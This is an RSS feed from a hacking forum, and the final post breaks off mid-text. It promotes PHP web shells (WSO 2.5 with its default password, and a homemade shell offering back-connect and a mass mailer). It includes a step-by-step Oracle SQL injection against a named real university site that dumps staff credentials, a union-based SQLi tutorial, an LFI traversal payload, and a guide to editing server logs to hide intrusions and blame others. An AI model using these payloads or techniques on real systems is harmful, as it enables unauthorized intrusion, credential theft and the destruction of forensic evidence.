<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
      <title>Web Application Security - iExploit</title>
      <link>http://iexploit.org/index.php?p=/categories/web-application-security/feed.rss</link>
      <pubDate>Sat, 18 May 13 08:42:38 -0400</pubDate>
         <description>Web Application Security - iExploit</description>
   <language>en-CA</language>
   <atom:link href="/index.php?p=/discussions/feed.rss" rel="self" type="application/rss+xml" />
   <item>
      <title>WSO 2.5</title>
      <link>http://iexploit.org/index.php?p=/discussion/5955/wso-2-5</link>
      <pubDate>Sun, 19 Feb 2012 00:05:23 -0500</pubDate>
      <dc:creator>undead</dc:creator>
      <guid isPermaLink="false">5955@/index.php?p=/discussions</guid>
      <description><![CDATA[<blockquote class="Quote"><div class="QuoteText">Features:<br><br>This utility provides a web interface for remote operation c operating system and its services / daemons.<br>Opportunity Description / features:<br>Authorization for the cookies<br>Server Information<br>File manager (copy, rename, move, delete, chmod, touch, create files and folders)<br>View, hexview, editing, downloading, uploading files<br>Working with zip archives (packing, unpacking) + compression tar.gz<br>Console<br>SQL Manager (MySql, PostgreSql)<br>Execute PHP code<br>Working with Strings + hash search online databases<br>Bindport and back-Connect (Perl)<br>Bruteforce FTP, MySQL, PgSQL<br>Search files, search text in files<br>Support for * nix-like and Windows systems<br>Antipoiskovik (check User-Agent, if a search engine then returns 404 error)<br>You can use AJAX<br>Small size. Packaged version is 22.8 Kb<br>The choice of encoding, which employs a shell.</div></blockquote><br><br>Screenshot:[spoiler]<br>http&#58;//i&#46;imgur&#46;com/j2HIJ&#46;png[/spoiler]<br><br>I edited the source a bit so the login screen now looks like this:<br><br>[spoiler]http&#58;//i&#46;imgur&#46;com/unQXZ&#46;png<br>[/spoiler]<br><br>Default password: <b>root</b><br>(if you want to change it change the auth_pass variable value with your md5 encoded password. <a class="postlink" rel="nofollow" href="http://www.adamek.biz/md5-generator.php">http://www.adamek.biz/md5-generator.php</a>)<br><br><a class="postlink" rel="nofollow" href="http://pastebin.com/Qra8yeWX">http://pastebin.com/Qra8yeWX</a>]]></description>
   </item>
   <item>
      <title>BEST HACKING SERVERS ARCHIVE !</title>
      <link>http://iexploit.org/index.php?p=/discussion/6302/best-hacking-servers-archive-</link>
      <pubDate>Sun, 21 Apr 2013 04:42:14 -0400</pubDate>
      <dc:creator>SuperMario</dc:creator>
      <guid isPermaLink="false">6302@/index.php?p=/discussions</guid>
      <description><![CDATA[Hello , today I want to share with you this site :<div><br></div><div>www.c99.me</div><div><br></div><div>It has very good stuff and most of them were priv8.</div><div>You can check there and see.&nbsp;</div>]]></description>
   </item>
   <item>
      <title>Few Exploits i found, enjoy...</title>
      <link>http://iexploit.org/index.php?p=/discussion/6227/few-exploits-i-found-enjoy-</link>
      <pubDate>Wed, 19 Dec 2012 13:18:10 -0500</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">6227@/index.php?p=/discussions</guid>
      <description><![CDATA[<span style="font-family: Arial, Verdana; font-size: small;">So i know this forum is sort of dead but here are a few exploits i found in a couple of MyBB plugins, one being stored XSS and the other Post SQL Injection allowing the user to become an admin.</span><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div><b><span style="cursor: pointer; text-indent: 3px;">MyBB Xbox Live ID Post SQLi &amp; Persistent XSS Vulnerabilities</span>:</b>&nbsp;<span style="font-family: Arial, Verdana; font-size: small;"><a href="http://1337day.com/exploit/description/19971" target="_blank" rel="nofollow">http://1337day.com/exploit/description/19971</a></span></div><div><span style="font-family: Arial, Verdana; font-size: small;"><br></span></div><div><b><span style="cursor: pointer; text-indent: 3px;">MyBB AJAX Chat Persistent XSS Vulnerability</span>:</b>&nbsp;<a href="http://1337day.com/exploit/description/19952" target="_blank" rel="nofollow">http://1337day.com/exploit/description/19952</a></div><div><br></div><div>Hope these help soneone out and maybe go towards getting this forum a little more active.</div>]]></description>
   </item>
   <item>
      <title>PostgreSQL</title>
      <link>http://iexploit.org/index.php?p=/discussion/6296/postgresql</link>
      <pubDate>Thu, 11 Apr 2013 04:20:42 -0400</pubDate>
      <dc:creator>iTTS3cur3</dc:creator>
      <guid isPermaLink="false">6296@/index.php?p=/discussions</guid>
      <description><![CDATA[Hi Everyone,<div><br></div><div>I'm busy learning and testing SQL injections with a PostgreSQL backend with multiple DB's. I'm using SQLMAP but can only enumerate 1 DB and it always defaults to public? Is there a way of enumerating all the DB's?</div><div><br></div><div>Kind Regards</div>]]></description>
   </item>
   <item>
      <title>Anyone got a tutorial for SQLi</title>
      <link>http://iexploit.org/index.php?p=/discussion/5685/anyone-got-a-tutorial-for-sqli</link>
      <pubDate>Sat, 13 Aug 2011 19:14:25 -0400</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">5685@/index.php?p=/discussions</guid>
      <description><![CDATA[Basically i have found that sites with a version less than 5 dont show the tables with standard injection, so my question is does anyone have or know of a tutorial for injecting these sites???]]></description>
   </item>
   <item>
      <title>NEW SHELL] G6 v1.1 PHP Web Shell .: Coded By Mr. P-teo :.</title>
      <link>http://iexploit.org/index.php?p=/discussion/6241/new-shell-g6-v1-1-php-web-shell-coded-by-mr-p-teo-</link>
      <pubDate>Sat, 05 Jan 2013 08:31:39 -0500</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">6241@/index.php?p=/discussions</guid>
      <description><![CDATA[<span style="color: #ffffff;"><span style="background-color: rgb(51, 51, 51);">So here it is guys the latest version of my shell, although there are still some bugs to be worked out and Download file isn't working i thought id share this with the community as i currently have no plans to update it for a while. No Time.</span><br style="background-color: rgb(51, 51, 51);"><br style="background-color: rgb(51, 51, 51);"><span style="background-color: rgb(51, 51, 51);">So heres some of the features:</span></span><ul style="background-color: rgb(51, 51, 51);"><li><span style="color: #ffffff;">File Browser</span></li><li><span style="color: #ffffff;">File Edit</span></li><li><span style="color: #ffffff;">File Delete</span></li><li><span style="color: #ffffff;">File Upload</span></li><li><span style="color: #ffffff;">Mass Mailer</span></li><li><span style="color: #ffffff;">Terminal, (exec, pass_thru, system)</span></li><li><span style="color: #ffffff;">PHP execution</span></li><li><span style="color: #ffffff;">Self Remove</span></li><li><span style="color: #ffffff;">Hash Identifier</span></li><li><span style="color: #ffffff;">Back Connect</span></li><li><span style="color: #ffffff;">Server Information</span></li><li><span style="color: #ffffff;">Small FileSize</span></li><li><span style="color: #ffffff;">Plus...<br></span></li></ul><span style="color: #ffffff;"><br style="background-color: rgb(51, 51, 51);"><span style="background-color: rgb(51, 51, 51);">So dont flame etc. This is free and has a small file size. Unlike most shells. Also this is 100% NOT backdoored.</span><br style="background-color: rgb(51, 51, 51);"><br style="background-color: rgb(51, 51, 51);"><span style="background-color: rgb(51, 51, 51);">Updated a little since these screens but oh well.</span><br style="background-color: rgb(51, 51, 51);"></span><div style="background-color: rgb(51, 51, 51);"><div class="spoiler_header"><span style="color: #ffffff;"><br></span></div></div><span style="background-color: rgb(51, 51, 51);"><b><span style="color: #ff0000;">Image Hosted By Gavii.com</span></b></span><div><span style="color: #ffffff;"><b><a href="http://gavii.com/puld/1292545809.png" target="_blank" rel="nofollow">http://gavii.com/puld/1292545809.png</a><br style="background-color: rgb(51, 51, 51);"></b><br style="background-color: rgb(51, 51, 51);"><span style="background-color: rgb(51, 51, 51);">Enjoy.</span><br style="background-color: rgb(51, 51, 51);"><br style="background-color: rgb(51, 51, 51);"><span style="background-color: rgb(51, 51, 51);">Download Link:&nbsp;</span><a rel="nofollow" href="http://adfoc.us/11410316132487" target="_blank" style="background-color: rgb(51, 51, 51);">http://adfoc.us/11410316132487</a></span></div>]]></description>
   </item>
   <item>
      <title>injection on Java Server Pages (jsp) based</title>
      <link>http://iexploit.org/index.php?p=/discussion/5697/injection-on-java-server-pages-jsp-based</link>
      <pubDate>Mon, 15 Aug 2011 11:08:42 -0400</pubDate>
      <dc:creator>schumbag</dc:creator>
      <guid isPermaLink="false">5697@/index.php?p=/discussions</guid>
      <description><![CDATA[ok,we'll trying it<br><div class="PreContainer"><pre>http&amp;#58;//www&amp;#46;mmu&amp;#46;edu&amp;#46;my/</pre></div><br>it's vulnerable<br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436</pre></div><br>like ussually,used a magic quotes<br><br><a class="postlink" rel="nofollow" href="https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436'">https://icems.mmu.edu.my/doe/doe_detail ... 001034436'</a><br><div class="PreContainer"><pre>SQL Error - ORA-00933&amp;#58; SQL command not properly ended</pre></div><br><br><br>and like our knowing at jsp extension using an oracle for databse application<br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=1--</pre></div><br>No. # Title(Specialization)<br>1 Web Programming<br>2 Data Mining<br>3 C Programming<br>4 Java Programming<br>5 Web Design<br>6 Visual Basic<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2--</pre></div><br><br>      No. # Title(Specialization)<br>      No record found!<br><br>--check sum column with order by (like a mysql commands)<br><br><a class="postlink" rel="nofollow" href="https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436'">https://icems.mmu.edu.my/doe/doe_detail ... 001034436'</a> and 1=1 order by 1--<br>still not error??try again!!<br><br><a class="postlink" rel="nofollow" href="https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436'">https://icems.mmu.edu.my/doe/doe_detail ... 001034436'</a> and 1=1 order by 2--<br><br>damn!!!still not error (_ _")<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=1 order by 3--</pre></div><br><br><div class="PreContainer"><pre>SQL Error - ORA-01785&amp;#58; ORDER BY item must be the number of a SELECT-list expression</pre></div><br><br>look at there,was reading!!if error at 3rd column that's mean them just 2 column have used<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select 1,2--</pre></div><br><br><br><div class="PreContainer"><pre>SQL Error - ORA-00923&amp;#58; FROM keyword not found where expected</pre></div><br>yeah,like that<br><br>--used command table dual (default command at oracle)<br><br><a class="postlink" rel="nofollow" href="https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436'">https://icems.mmu.edu.my/doe/doe_detail ... 001034436'</a> and 1=2 union all select 1,2 from dual--<br><br><div class="PreContainer"><pre>SQL Error - ORA-01790&amp;#58; expression must have same datatype as corresponding expression</pre></div><br>dont' be confused,so why make a command table dual??<br>for references go here...<br><a class="postlink" rel="nofollow" href="http://en.wikipedia.org/wiki/DUAL_table">http://en.wikipedia.org/wiki/DUAL_table</a><br><br>right,after thats numb we'll change with 'null' &lt;= not used semicolon<br><br><a class="postlink" rel="nofollow" href="https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436'">https://icems.mmu.edu.my/doe/doe_detail ... 001034436'</a> and 1=2 union all select null,null from dual--<br><div class="PreContainer"><pre>No&amp;#46; # Title(Specialization) 1 null</pre></div><br>wow sudah tidak error lagi :D<br>hey,XSS bug also!!we'll try that<br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select null, '&amp;lt;iframe width=1000 height=700 src=http&amp;#58;//iexploit&amp;#46;org&amp;gt;&amp;lt;/iframe&amp;gt;' FROM dual--</pre></div><br><br>but,i'll next step at jsp injection<br>but this is differentwith sqlinjection using mysql for database application<br><br>--if an oracle version checked at the inside column banner to the table v$version<br>example :<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select null,banner FROM v$version--</pre></div><br><div class="PreContainer"><pre>No&amp;#46; # Title(Specialization)<br>1 Oracle Database 10g Enterprise Edition Release 10&amp;#46;2&amp;#46;0&amp;#46;1&amp;#46;0 - 64bi<br>2 PL/SQL Release 10&amp;#46;2&amp;#46;0&amp;#46;1&amp;#46;0 - Production<br>3 CORE 10&amp;#46;2&amp;#46;0&amp;#46;1&amp;#46;0 Production<br>4 TNS for Linux&amp;#58; Version 10&amp;#46;2&amp;#46;0&amp;#46;1&amp;#46;0 - Production<br>5 NLSRTL Version 10&amp;#46;2&amp;#46;0&amp;#46;1&amp;#46;0 - Production</pre></div><br><br>see??<br><br>now,we'll check at username with commands : <div class="PreContainer"><pre>user FROM dual--</pre></div><br>like this :<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select null,user FROM dual--</pre></div><br>and the username is . . ..  ICEM_WEB <br><br>look at the database:)<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select null,global_name FROM global_name--</pre></div><br><br>explore again!!!<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select null,'database--&amp;gt;' || global_name FROM global_name--</pre></div><br><br>1 database--&gt;ICEMS.WORLD<br><br>maybe this one an oracle advantage, could be more neat in appearance and good looking<br><br>if in mysql we use for combining the command string make --&gt; concat(str1,str2)<br><br>but at mssql we used --&gt; str1 + str2<br><br>but we're try at oracle --&gt; str1 || str2<br><br><br>end off,the intermezzo,now we're continous<br>let we looked users at table all_users,make commands :<br>username from all_users--<br>example :<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select null,username from all_users--</pre></div><br><br>No. # Title(Specialization)<br>1 SYS<br>2 SYSTEM<br>3 OUTLN<br><br>*SKIP =&gt; too long<br>not important :P but if you will dump it's ok<br>maybe,we can got CC (lol)<br><br><br>--look at all table and user... for next column table_name and owner at table all_tables<br><br>we used again command like a before but modifying :)<br>and look the result<br><br>nama_pemilik_table--&gt;nama_table<br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select null,owner || '--&amp;gt;' || table_name from all_tables--</pre></div><br><br>       <br><div class="PreContainer"><pre>1 SYS--&amp;gt;DUAL<br>2 SYS--&amp;gt;SYSTEM_PRIVILEGE_MAP<br>3 SYS--&amp;gt;TABLE_PRIVILEGE_MAP<br>4 SYS--&amp;gt;STMT_AUDIT_OPTION_MAP<br>5 SYSTEM--&amp;gt;DEF$_TEMP$LOB<br>6 WMSYS--&amp;gt;WM$WORKSPACES_TABLE<br>7 WMSYS--&amp;gt;WM$VERSION_TABLE<br><br>*SKIP = &amp;gt; too long<br><br>458 ICEM_USER--&amp;gt;ICEMS_LOGO<br>459 ICEM_USER--&amp;gt;SOSC_PAYMENT<br>460 ICEM_USER--&amp;gt;STAFF_PROFILE<br><br>*SKIP AGAIN =&amp;gt; too long<br><br>524 SYSTEM--&amp;gt;OL$<br>525 SYS--&amp;gt;WRI$_ADV_ASA_RECO_DATA<br>526 ICEM_USER--&amp;gt;EXAM_STUD_SCHEDULE_BKP<br>527 ICEM_USER--&amp;gt;OAE_QUE</pre></div><br><br>*EXPLANATION<br>table all_tables this is like with information_schema.tables if at mysql injection<br>they saved tables name (table_name).<br><br>look at there this content<br><br>ICEM_USER--&gt;STAFF_PROFILE<br><br>that's make me curious table STAFF_PROFILE<br><br>-look at columns table STAFF_PROFILE --&gt; used all_tab_columns<br><br>this is like an information_schema.columns<br>and his function saved column_name<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select null,column_name from all_tab_columns where table_name='STAFF_PROFILE'--</pre></div><br>look again the content:<br><br>STAFF_USERNAME, STAFF_NAME sama STAFF_LOGIN<br><br><div class="PreContainer"><pre>https&amp;#58;//icems&amp;#46;mmu&amp;#46;edu&amp;#46;my/doe/doe_detail&amp;#46;jsp?id=1001034436' and 1=2 union all select null,STAFF_USERNAME || ' &amp;#58; ' || STAFF_NAME || ' &amp;#58; ' || STAFF_LOGIN from STAFF_PROFILE--</pre></div><br>so,next step you must looking for admin page :)<br><br>*NOTE : maybe you guys will laugh with the web since 2010 still not patching i'm attacking because of cyber war <br>between indonesian vs malaysian 1 years ago *LOL]]></description>
   </item>
   <item>
      <title>Help on kind of LFI</title>
      <link>http://iexploit.org/index.php?p=/discussion/6259/help-on-kind-of-lfi</link>
      <pubDate>Sun, 10 Feb 2013 23:37:33 -0500</pubDate>
      <dc:creator>Didac</dc:creator>
      <guid isPermaLink="false">6259@/index.php?p=/discussions</guid>
      <description><![CDATA[Hi, i found a web aplication with a kind of LFI and i tested know ways of exploiting but it only fails<br>the /self/environ returns blank<br>if i am wrong, log poisonning is useless because the code doesnt include the local file<br>tried to view the tomcat users and password file but are commented &lt;!-- bla bla --&gt;<br>the os is Centos 5.9, apache tomcat 7.0.34 have cpanel<br><br>here is the code is a jsp file but i think the server also support php<br><span style="color: #33cc00;"><br><br>&lt;%@page import="java.io.FileInputStream"%&gt;<br>&lt;%@page import="java.io.File"%&gt;<br>&lt;%@page import="java.io.OutputStream" %&gt;<br><br>&lt;%<br>&nbsp;&nbsp;&nbsp; String titulo = request.getParameter("T");<br><br>&nbsp;&nbsp;&nbsp; String path = request.getServletContext().getRealPath("")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; + "/WEB-INF/pdf/" + titulo + ".pdf";<br>&nbsp;&nbsp;&nbsp; File file = new File(path);<br><br>&nbsp;&nbsp;&nbsp; try {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; FileInputStream fis = new FileInputStream(file);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; byte[] pdf = new byte[(int) file.length()];<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fis.read(pdf, 0, (int) file.length());<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fis.close();<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; response.setContentType("application/pdf");<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; OutputStream os = response.getOutputStream();<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; os.write(pdf);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; os.close();<br><br>&nbsp;&nbsp;&nbsp; } catch (Exception e) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; response.setContentType("text/html;charset=UTF-8");<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; out.print("&lt;h3 style=\"text-align:center;color:#900\"&gt;PDF no encontrado&lt;/h3&gt;");<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; out.close();<br>&nbsp;&nbsp;&nbsp; }<br>%&gt;</span><br><br>the nmap gived this report of services<br><br><span style="color: #ffcc33;">21/tcp&nbsp;&nbsp; open&nbsp; ftp?<br>|_ftp-anon: ERROR: Script execution failed (use -d to debug)<br>|_ftp-bounce: no banner<br>22/tcp&nbsp;&nbsp; open&nbsp; ssh?<br>25/tcp&nbsp;&nbsp; open&nbsp; smtp?<br>|_smtp-commands: Couldn't establish connection on port 25<br>53/tcp&nbsp;&nbsp; open&nbsp; domain?<br>80/tcp&nbsp;&nbsp; open&nbsp; http?<br>110/tcp&nbsp; open&nbsp; pop3?<br>143/tcp&nbsp; open&nbsp; imap?<br>| imap-capabilities: <br>|_&nbsp; ERROR: Failed to connect to server<br>443/tcp&nbsp; open&nbsp; https?<br>587/tcp&nbsp; open&nbsp; submission?<br>|_smtp-commands: Couldn't establish connection on port 587<br>993/tcp&nbsp; open&nbsp; imaps?<br>995/tcp&nbsp; open&nbsp; pop3s?<br>8080/tcp open&nbsp; http-proxy?</span><br><br>What can i do to gain RCE?<br><br>PD: sorry for my english<br>]]></description>
   </item>
   <item>
      <title>SQL Union Based Inj3ction</title>
      <link>http://iexploit.org/index.php?p=/discussion/6212/sql-union-based-inj3ction</link>
      <pubDate>Wed, 07 Nov 2012 22:16:26 -0500</pubDate>
      <dc:creator>DazHolmes</dc:creator>
      <guid isPermaLink="false">6212@/index.php?p=/discussions</guid>
      <description><![CDATA[<span style="font-family: Arial, Verdana; font-size: small;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><br><pre id="taag_output_text" class="fig" style="font-family: monospace; font-size: 13px; font-weight: normal; white-space: pre; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); margin-top: 15px; margin-bottom: 15px;">________                  ___ ___        .__                         <br>\______ \ _____  ________/   |   \  ____ |  |   _____   ____   ______<br> |    |  \\__  \ \___   /    ~    \/  _ \|  |  /     \_/ __ \ /  ___/<br> |    `   \/ __ \_/    /\    Y    (  &lt;_&gt; )  |_|  Y Y  \  ___/ \___ \ <br>/_______  (____  /_____ \\___|_  / \____/|____/__|_|  /\___  &gt;____  &gt;<br>        \/     \/      \/      \/                   \/     \/     \/</pre><span style="font-family: Arial, Verdana; font-size: small;">&nbsp;&nbsp;&nbsp;&nbsp; </span><br><span style="font-family: Arial, Verdana; font-size: small;">##By Daz Holmes Inj3ct0rs</span><br><span style="font-family: Arial, Verdana; font-size: small;">## www.example.com/post.php?id=276 Order by 10-- :No Error At it's highest table.</span><br><span style="font-family: Arial, Verdana; font-size: small;">## www.example.com/post.php?id=276 union all select 1,2,3,4,5,6,7,8,9,10--&nbsp;&nbsp;&nbsp; :Their will Appear some numbers &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><br><span style="font-family: Arial, Verdana; font-size: small;"><br>##The Number you Need will be Black and bold Witch is in my case is 6</span><br><span style="font-family: Arial, Verdana; font-size: small;">##www.example.com/post.php?id=276 union all select 1,2,3,4,5,version(),7,8,9,10-- :So Now You take, the Number 6 and replace with Version() This will give you the version of the sql database 5.1.61-0+squeeze1</span><br><span style="font-family: Arial, Verdana; font-size: small;">## www.example.com/post.php?id=276 union all select 1,2,3,4,5,table_name,7,8,9,10 from information_schema.tables&nbsp; :Now Remove the Version and add table_name And take the -- of the end and add from information_schema.tables Now you see the tables I see ck_users Now you will need to code this into ascii So here is the, link </span><a rel="nofollow" href="http://easycalculation.com/ascii-hex.php" style="font-family: Arial, Verdana; font-size: 10pt; font-weight: normal;">http://easycalculation.com/ascii-hex.php</a><br><span style="font-family: Arial, Verdana; font-size: small;">When u type in their u will want the </span><span style="font-family: 'Times New Roman'; font-size: medium; font-weight: normal; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: rgb(230, 236, 246); float: none; display: inline !important;">Equivalent Decimal / Ascii Value And u need to remove the spaces like so 99,107,95,117,115,101,114,115 <br>Now Add this to you're following link&nbsp; from information_schema.columns where table_name=char(99,107,95,117,115,101,114,115 )-- With you're own code And change Table_names to column_name&nbsp;</span><div style="font-family: Arial, Verdana; font-size: 10pt; font-weight: normal;"><span style="color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: rgb(230, 236, 246); display: inline !important; float: none;"><br></span></div><div><span style="color: #cc0000; font-size: large;"><b>ADMIN NOTICE: We do not condone unlawful attacks against any network, private, or public. -m0rph</b></span></div><br>You should look like this<br><pre><code><a href="http://www.example.com/post.php?id=276%20union%20all%20select%201,2,3,4,5,column_name,7,8,9,10%20from%20information_schema.columns%20where%20table_name=char%2899,107,95,117,115,101,114,115%20%29--" target="_blank" rel="nofollow">http://www.example.com/post.php?id=276 union all select 1,2,3,4,5,column_name,7,8,9,10 from information_schema.columns where table_name=char(99,107,95,117,115,101,114,115 )--</a></code></pre><br>##Now i See password. Now remove Column_name And add password and Remove all the rest you should look like this <pre><code><a href="http://www.example.com/post.php?id=276%20union%20all%20select%201,2,3,4,5,password,7,8,9,10%20from%20ck_users--" target="_blank" rel="nofollow">http://www.example.com/post.php?id=276 union all select 1,2,3,4,5,password,7,8,9,10 from ck_users--</a></code></pre><pre id="line1"><span></span><span></span><span><a rel="nofollow" href="/index.php?p=/search&amp;Search=%23So&amp;Mode=like">#So</a> now i see the md5 hash password </span>7bf5d02375375bb1066f2ebb8b9e0fff Hope, this helped. End results look like this.</pre>]]></description>
   </item>
   <item>
      <title>Doubt regarding Local File Inclusion(PHP Knowledge enough)</title>
      <link>http://iexploit.org/index.php?p=/discussion/6238/doubt-regarding-local-file-inclusionphp-knowledge-enough</link>
      <pubDate>Wed, 02 Jan 2013 12:37:58 -0500</pubDate>
      <dc:creator>XinR</dc:creator>
      <guid isPermaLink="false">6238@/index.php?p=/discussions</guid>
      <description><![CDATA[Let this be the LFI Vulnerable script<br><br>&lt;?php&lt;br /&gt;   $file = str_replace('../', '', $_GET['file']);<br>   if(isset($file))<br>   {<br>       include("pages/$file");<br>   }<br>   else<br>   {<br>       include("index.php");<br>   }<br>   ?&gt;<br><br><br>And  we pass <br>   http://example.com/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd to attack<br><br>But how exactly is the file included now? Wont the scipt now be equivalent so that $file = ..%2F..%2F..%2F..%2Fetc%2Fpasswd<br><br><br>Only browser knows 2F = '/' so how can server include the file? HOw does it exactly understands it??<br><br>Danks&gt;<br><br>Xin R]]></description>
   </item>
   <item>
      <title>Hide your Hacks, Small Tut.</title>
      <link>http://iexploit.org/index.php?p=/discussion/6145/hide-your-hacks-small-tut-</link>
      <pubDate>Mon, 03 Sep 2012 07:59:24 -0400</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">6145@/index.php?p=/discussions</guid>
      <description><![CDATA[<b>Hiding Your Tracks When Hacking</b><br><br><br><b>So Step one. Error Logs.</b><br>Errors are offen used in web hacking to gather information from the sites database or includes, some examples of these are:<br><code>SQLi - Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in </code><br><code>LFI - Warning: include(includes/../) [function.include]: failed to open stream: No such file or directory in</code><br><code>FPD - Warning: htmlspecialchars_decode() expects parameter 1 to be string, array given in /home</code><br><br>The problem with these errors is that most of the time they are logged in a file called error_log. Usually found in the <b>/public_html/</b> use your shell to edit the file.<br><br>The file will contain all errors found on the site and the url in which the error occured. Simple enough, remove all of the errors that you caused.<br><br><br>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<br><br><br><br><br><b>So Step Two. .lastLogin</b><br><br><br>Depending on how you uploaded your shell this may not need doing. Some admin panels record the last login on a file called .lastLogin, this will record nothing but your IP address, hence always use protection.<br><br>This file can usually be found in the<b>/home/sitename/</b> directory, use your shell to edit the file with a random ip and your all good.<br><br>Save your changes and move on.<br><br><br>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<br><br><br><br><b>So Step Three. Access-Logs.</b><br>Access logs will be the main focus of this tutorial as they gather a fair bit of information from your http request to the site. They will gather the URL you used your IP and browser plus a few other bits and bobs.<br><br>As you can see this is where you will be able to start blaming other people for the hacks, or making it seem as if you were never there. Now to find this file simply navigate to the following directory - <b>home/sitename/access-logs/</b><br><br>Within this directory there will be a file called yoursitename.com Use your shell to edit the file, within you will find contents similar to <br><code>127.0.0.1 - [10/Oct/2000:13:55:36 -0700] &quot;GET /apache_pb.gif HTTP/1.0&quot; 200 2326 &quot;<a href="http://www.example.com/start.html&amp;quot" target="_blank" rel="nofollow">http://www.example.com/start.html&amp;quot</a>; &quot;Mozilla/4.08 [en] (Win98; I ;Nav)&quot;</code><br><br>Now at the start there is an IP, then Date and Time, nexr there is a small bigt you dont need to worrie about. And finally there is the url your requested 